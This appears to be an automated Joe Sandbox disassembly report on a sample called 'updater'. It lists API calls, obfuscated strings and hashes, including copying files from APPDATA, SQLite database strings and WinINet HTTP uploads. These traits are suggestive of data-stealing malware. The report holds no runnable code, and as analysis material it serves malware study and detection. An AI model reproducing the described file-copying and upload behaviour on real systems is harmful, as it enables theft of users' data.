                                  control_flow_graph 4495 13cd88b-13cd9a3 call 1440cfc call 13c8f5d * 2 call 13de8c7 call 13dfa3b call 13de917 call 13dfa3b call 13ddf41 * 5 4520 13cd9dd-13cd9e4 4495->4520 4521 13cd9a5-13cd9b8 call 141db91 4495->4521 4523 13cd9f5-13cda43 call 142614e call 13ddfe8 call 13de917 call 13ddf41 call 13cdd3e 4520->4523 4524 13cd9e6 4520->4524 4521->4520 4529 13cd9ba-13cd9dc call 13dd1e6 call 141dfe8 call 141db47 4521->4529 4544 13cda45 4523->4544 4545 13cda51-13cdaa8 call 13ddfe8 call 13dfec9 call 13c3174 call 13ddd77 4523->4545 4527 13cd9e8-13cd9f3 4524->4527 4527->4523 4527->4527 4529->4520 4546 13cda47-13cda4f 4544->4546 4555 13cdaae-13cdb24 call 13dfec9 call 13c2e70 call 13ddd77 call 13ca25a * 2 4545->4555 4556 13cdcc7 4545->4556 4546->4545 4546->4546 4574 13cdb2d-13cdb2f 4555->4574 4575 13cdb26-13cdb2b call 13c16cb 4555->4575 4557 13cdcc9-13cdd3d call 13ddf41 * 3 4556->4557 4577 13cdb35-13cdba9 call 13dfec9 call 13c3225 call 13ddd77 call 13de5d4 CopyFileA call 13ddf41 4574->4577 4578 13cdc81-13cdc83 4574->4578 4575->4574 4602 13cdbaf-13cdc09 call 13c23eb call 13de5d4 call 13de946 4577->4602 4603 13cdc64-13cdc7c call 13c2ebb 4577->4603 4580 13cdc8c-13cdc98 4578->4580 4581 13cdc85-13cdc87 call 13c16cb 4578->4581 4585 13cdc9f-13cdcc5 call 13dfec9 call 13c3225 call 13ddd77 4580->4585 4586 13cdc9a call 13c16cb 4580->4586 4581->4580 4585->4557 4586->4585 4612 13cdc0d-13cdc54 call 13c83df call 13ddf41 * 2 call 13ddd77 4602->4612 4613 13cdc0b 4602->4613 4603->4574 4612->4603 4613->4612
                                  APIs
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • CopyFileA.KERNEL32 ref: 013CDB97
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                  • String ID: (\;$.$APPDATA$A\OI$KrBK$Lr$XKBJ
                                  • API String ID: 265086031-1641328896
                                  • Opcode ID: 148284c69a845b3d3a650380149941e34ae429c4cec856bfec087d548ec4d33e
                                  • Instruction ID: 95f7bd4650a04c9dacc5f7b9d50aa161cf2f87e8046d6ebd64b93fcddf0ed2f8
                                  • Opcode Fuzzy Hash: 148284c69a845b3d3a650380149941e34ae429c4cec856bfec087d548ec4d33e
                                  • Instruction Fuzzy Hash: 4CE18C31D0524ADEDF15EBE8D990AEDBBB4AF24308F2440AED40667291DB702F49CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • InternetOpenA.WININET(01464FBC,00000000,00000000,00000000,00000000), ref: 013DC4E1
                                  • InternetConnectA.WININET(00000000,01462A14,00000050,00000000,00000000,00000003,00000000,00000000), ref: 013DC507
                                  • HttpOpenRequestA.WININET(00000000,01464D5C,01464CFC,00000000,00000000,00000000,8468C200,00000000), ref: 013DC605
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  • InternetCloseHandle.WININET(~a}z), ref: 013DC7E8
                                  • InternetCloseHandle.WININET(?), ref: 013DC7ED
                                  • InternetCloseHandle.WININET(?), ref: 013DC7F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CriticalSection$CloseHandle$EnterLeaveOpen$ConditionConnectHttpRequestVariableWake
                                  • String ID: [^BAOJK\.$~a}z
                                  • API String ID: 3302835935-3567702361
                                  • Opcode ID: bb180a53aeba31f9b209122fa84d0f31d65bd3ae86af45c09118dbc070cf0598
                                  • Instruction ID: e41fb2397974735f01c1af37543ad5da183f466f72dae8e1f5df3f9ba2a8b41f
                                  • Opcode Fuzzy Hash: bb180a53aeba31f9b209122fa84d0f31d65bd3ae86af45c09118dbc070cf0598
                                  • Instruction Fuzzy Hash: B9B156B2D042459FDF15DFB8E848AADBBB5FF2521CF29111EE0516B2B1CB701882CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$InformationTimeZone
                                  • String ID: Pacific Daylight Time$Pacific Standard Time
                                  • API String ID: 597776487-1154798116
                                  • Opcode ID: c562e7ad8317d9d93ee54ebe5218aff0cbb88108748861cd0e135a71892eed99
                                  • Instruction ID: c2bea9526d2e208dc95aca3579050969e85491ac89eb2f8127dd6cc244f87ab4
                                  • Opcode Fuzzy Hash: c562e7ad8317d9d93ee54ebe5218aff0cbb88108748861cd0e135a71892eed99
                                  • Instruction Fuzzy Hash: 5AC14A719002069FDB299F6DD840AAA7BB9FFA9214F14415FE590DB372E7348E42CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • CopyFileA.KERNEL32 ref: 013CEB81
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                  • String ID: (\;$BKZ$JOZ.$JOZ.$rYOB$rYOBBKZJOZ.
                                  • API String ID: 265086031-507006662
                                  • Opcode ID: 5d0740080deee1ac9f1a9e1a6735847d400c3668d93845b192b411c73e8fb8de
                                  • Instruction ID: e25b5ebb4ba1f9c7b2579173f0899a9af0cba0f1d349d28ae8045aa09b54a540
                                  • Opcode Fuzzy Hash: 5d0740080deee1ac9f1a9e1a6735847d400c3668d93845b192b411c73e8fb8de
                                  • Instruction Fuzzy Hash: 81C10431D0028ADEDF14EBA8D844BDDBFB4BF25708F24419ED5567B2A1DB701A49CB12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 013DC368
                                  • InternetWriteFile.WININET(?,?,?,?), ref: 013DC37D
                                  • InternetWriteFile.WININET(?,?,?,?), ref: 013DC388
                                  • InternetWriteFile.WININET(?,?,00000010,?), ref: 013DC395
                                  • HttpEndRequestA.WININET(?,00000000,00000000,00000000), ref: 013DC39E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileInternetWrite$HttpRequest$Send
                                  • String ID: (
                                  • API String ID: 2326806561-3887548279
                                  • Opcode ID: db8bd83ab14e505559ba86fb347a68b15823414f22a341eaf73aacacdaaebb34
                                  • Instruction ID: ac5be5abd8f2d86b151712b3915e4d4a2e776d6bba83e2b6db9bee3a601b80f3
                                  • Opcode Fuzzy Hash: db8bd83ab14e505559ba86fb347a68b15823414f22a341eaf73aacacdaaebb34
                                  • Instruction Fuzzy Hash: 4B311CB2D04219AFDB15DFA8DC84AEEBFB8FF48304F14842EE516A7251D7359605CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 0-537541572
                                  • Opcode ID: 1eeb35443d57e11aeda2f39f7e9d375539900f7c167ebfa20e99ff90431df2c0
                                  • Instruction ID: c42aacc9d6e658eee8bd831686d3b3e85ca2d0c450402d6e0289119ff8e0c44a
                                  • Opcode Fuzzy Hash: 1eeb35443d57e11aeda2f39f7e9d375539900f7c167ebfa20e99ff90431df2c0
                                  • Instruction Fuzzy Hash: 6A21D576A01231ABDF328B289C80A1B7BB8AF057A0FD50516ED05A73B5E730DD49C6E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  • CopyFileA.KERNEL32 ref: 013CE687
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                  • String ID: (\;$APPDATA$BKZ.$rLWZKMAG@.
                                  • API String ID: 265086031-61289390
                                  • Opcode ID: 16fe0ee3b98ae1f2a127a09bf26a785175073b93e50346becfbe0aa45a528ceb
                                  • Instruction ID: aa7e5dca6a35a05076d079e59a217ece9ceba0a2bf8ff6a816b78522f1890fea
                                  • Opcode Fuzzy Hash: 16fe0ee3b98ae1f2a127a09bf26a785175073b93e50346becfbe0aa45a528ceb
                                  • Instruction Fuzzy Hash: 1A027A31D00259DEDF25EBA8D990BDDBBB4AF25308F2041AED4467B291DB741E48CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • CopyFileA.KERNEL32 ref: 013CF4EB
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                  • String ID: (\;$.$APPDATA$r.
                                  • API String ID: 265086031-561754209
                                  • Opcode ID: be7e0b4deaa5060b1d569166766f92009975515cad786a2c1e3a61a3f174af58
                                  • Instruction ID: 23e7cd076f38e8eaa72af7b9651e8dabb7b26b4e31be1edbce0090f5cd6b9854
                                  • Opcode Fuzzy Hash: be7e0b4deaa5060b1d569166766f92009975515cad786a2c1e3a61a3f174af58
                                  • Instruction Fuzzy Hash: 97E1AE31D0024ADEDF15EBA8D990BEDBBB4AF24308F2441AED41677291DB706F49CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strlen
                                  • String ID: -journal$-stmtjrnl$:memory:
                                  • API String ID: 4218353326-2512898500
                                  • Opcode ID: 0d602fe9080de05961a04fd1e59daa3d1c122a1b412db522f5daac9297f5d1d6
                                  • Instruction ID: 46d2e53dbcd04d3c9b56de0dda04aaac2f1adecec9c2f0c21a983f62d35cf2a1
                                  • Opcode Fuzzy Hash: 0d602fe9080de05961a04fd1e59daa3d1c122a1b412db522f5daac9297f5d1d6
                                  • Instruction Fuzzy Hash: 8BB1CD71A007169FDB25DFADC844AAABBF1EF58308F14482EE59AE7781D631E901CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0142221F,?,?,01464064,00000000,?,0142234A,00000004,InitializeCriticalSectionEx,0144BC58,0144BC60,00000000), ref: 014221EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-
                                  • API String ID: 3664257935-2084034818
                                  • Opcode ID: aefbb7b3295f61ed4ae9241429641a22a9e57227c40012071bde908d29fa27c0
                                  • Instruction ID: 6fb9140d7d7373d560562d1fb1d042d9f788600f6f8951301199674af754aa8e
                                  • Opcode Fuzzy Hash: aefbb7b3295f61ed4ae9241429641a22a9e57227c40012071bde908d29fa27c0
                                  • Instruction Fuzzy Hash: D811A03AA01235ABDF324B6CAC40F6A77A4BF05760F650512EF10E73A4DBB0E98186D1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __alloca_probe_16.LIBCMT ref: 01431537
                                  • __alloca_probe_16.LIBCMT ref: 014315FD
                                  • __freea.LIBCMT ref: 01431669
                                    • Part of subcall function 0143255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0143838D,00000220,?,?,?,?,?,?,01423E8D,?), ref: 0143258E
                                  • __freea.LIBCMT ref: 01431672
                                  • __freea.LIBCMT ref: 01431695
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                  • String ID:
                                  • API String ID: 1423051803-0
                                  • Opcode ID: f93800efb52291702c8413004776dd618b779e0dc333c9c64ad2ce5fa99b97fe
                                  • Instruction ID: d4710a14cf5aab5b304d0906183aeee3143965c0c4eb0bdd58084ded1e42680b
                                  • Opcode Fuzzy Hash: f93800efb52291702c8413004776dd618b779e0dc333c9c64ad2ce5fa99b97fe
                                  • Instruction Fuzzy Hash: 2B51B972500217AFFB219FA9DC40EBB3BA9EFD9A50F19012BFD0997260D770DC5196A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013FCC8A: _strlen.LIBCMT ref: 013FCCB1
                                  • _strlen.LIBCMT ref: 013FE07E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strlen
                                  • String ID: $%s.%s$sqlite_subquery_%p_
                                  • API String ID: 4218353326-1950918665
                                  • Opcode ID: 165251b440d265142d5d96c6a5ce2a3ce2514d922ce09ff14abc3a783be980d2
                                  • Instruction ID: c92b60f812fb2e1ce8d2d51b822ac4e7f7c3cf39ae63193a061457b995051522
                                  • Opcode Fuzzy Hash: 165251b440d265142d5d96c6a5ce2a3ce2514d922ce09ff14abc3a783be980d2
                                  • Instruction Fuzzy Hash: B6026E71E0020A9FDB15CFA9C884BAEBBF2FF54318F25856DD605AB361D734A841CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • CopyFileA.KERNEL32 ref: 013CEFFE
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                  • String ID: (\;$APPDATA$r.
                                  • API String ID: 265086031-3718514597
                                  • Opcode ID: 9e6d035453d78e6b7db862d080edc344fcb31c28262a13e9fc730e9109b2d491
                                  • Instruction ID: 5d3e77d2fac7800d26920c2b4ec851631c69b2ac11cd34abf9e514c46dac1294
                                  • Opcode Fuzzy Hash: 9e6d035453d78e6b7db862d080edc344fcb31c28262a13e9fc730e9109b2d491
                                  • Instruction Fuzzy Hash: A7E19D31D0028ADEDF15EBA8C890BEDBBB4AF25308F2441AED41577291DB706F89CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • CopyFileA.KERNEL32 ref: 013CD6D8
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                  • String ID: (\;$APPDATA$ro\CA\Wr.
                                  • API String ID: 265086031-9018626
                                  • Opcode ID: 2ee90c21514c72bf44f5a08dfab9cf974885f172a5827e958561523512ee2167
                                  • Instruction ID: 698fe44c86bb5772c599ee0cad2ad25ac571dee61e656a09b7ee34f486bf102f
                                  • Opcode Fuzzy Hash: 2ee90c21514c72bf44f5a08dfab9cf974885f172a5827e958561523512ee2167
                                  • Instruction Fuzzy Hash: 77E17B31D0129ADEDF15EBA8D990BDDBBB4AF24308F20809ED5467B291DB705F48CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013DA518: LoadLibraryA.KERNEL32(01465C78), ref: 013DA5B7
                                    • Part of subcall function 013DA518: GetProcAddress.KERNEL32(00000000,0146606C), ref: 013DA645
                                  • FreeLibrary.KERNEL32 ref: 013DAECC
                                  Strings
                                  Memory Dump Source
